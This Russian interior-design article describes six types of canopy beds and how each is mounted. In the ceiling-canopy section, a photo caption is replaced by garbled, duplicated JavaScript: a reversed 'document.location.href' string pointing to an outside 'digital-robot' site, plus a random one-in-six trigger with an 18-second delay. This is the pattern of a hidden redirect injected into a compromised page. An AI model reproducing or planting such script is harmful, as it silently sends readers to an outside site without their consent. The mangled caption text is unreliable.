Добавить в закладки

Королевское ложе: 6 видов кроватей с балдахином

Кровать с балдахином украшала царские покои еще в прошлых столетиях. Кроме декоративных свойств, она исполняла и защитную роль. Сегодня их использование возрождается, но уже в качестве стильного аксессуара.

Кровать с балдахином

Кровать с балдахином. Фото: stroy-podskazka.ru

С ее помощью помещение приобретает уют, обозначается спальная зона и подчеркивается стилистика комнаты. Использование способа уравновешивает большую спальню, а маленькую зрительно уменьшает. Следует помнить, что полотна быстро впитывают в себя пыль, поэтому навес придется часто стирать.

Разновидности

Варианты оформления отличаются между собой размерами, материалами и конструкциями. Предлагаем рассмотреть наиболее популярные из них.

Каркасный

Каркасный балдахин идеально подходит для большой кровати. Над ней устанавливается рама на четырех опорах с равномерно распределенной тканью. Каркас может быть изготовлен из дерева, металла и других материалов, выбор которых зависит от личных предпочтений и бюджета. Наиболее выигрышно смотрятся кованные или резные опоры из дерева. Кровать, прикрытая полотном со всех сторон, станет интимной зоной в квартире-студии или в многофункциональной комнате.

Каркасный балдахин

Каркасный балдахин. Фото: dekorspalni.ru

Бескаркасный

Бескаркасный балдахин доступен к установке в помещениях с самыми необычными формами потолка. Современный способ предполагает собой крепление одного конца ткани к стене над кроватным изголовьем так, чтобы второй свисал с потолочной перекладины в конце кровати. Также существует вариант, когда обе планки прибиты к потолку, а длинная ткань просто накидывается сверху.

Бескаркасный балдахин

Бескаркасный балдахин. Фото: f-bit.ru

Потолочный

Рама для потолочного балдахина крепится с помощью крючков на потолок или на прикрученное к нему гипсокартонное крепление. Обычно подвесные конструкции округлой формы. Для красоты под потолком можно разместить подсветку. Такой вид занавеса придает помещению воздушности и хорошо скрывает спальное место.

Потолочный балдахин

Потолочный балдахин. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tory.com»>loveshtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tory.com

Настенный

Настенный балдахин представляет собой навес на дугообразном каркасе, прикрепленном к стене над изголовьем или сбоку. Уютная атмосфера создается с помощью декоративных или натуральных полотен, задающих стиль всей комнате.

Настенный балдахин

Настенный балдахин. Фото: obustroeno.com

Коронообразный

Круг коронообразного балдахина, на который нанизана ткань, держится за корону, размещенную на потолке по центру кровати. Такой способ смотрится в интерьере достаточно неординарно.

 

Коронообразный балдахин

Коронообразный балдахин. Фото: trizio.ru

Детский

Детские кроватки наиболее часто оформляются балдахином не только для красоты, но и для защиты от насекомых, света, шума и посторонних глаз. Детские балдахины изготавливаются из самых разных материалов в широкой цветовой гамме. Для новорожденных лучше обустроить его на стойке, закрывающий каждую сторону. Детям постарше будет удобнее с занавесом, прикрывающим лишь изголовье.

Балдахин для детской кроватки

Балдахин для детской кроватки. Фото: ae01.alicdn.com

Кровать с балдахином – это утонченный способ подчеркнуть дизайн спальни и создать в ней расслабляющую атмосферу.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 25.06.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: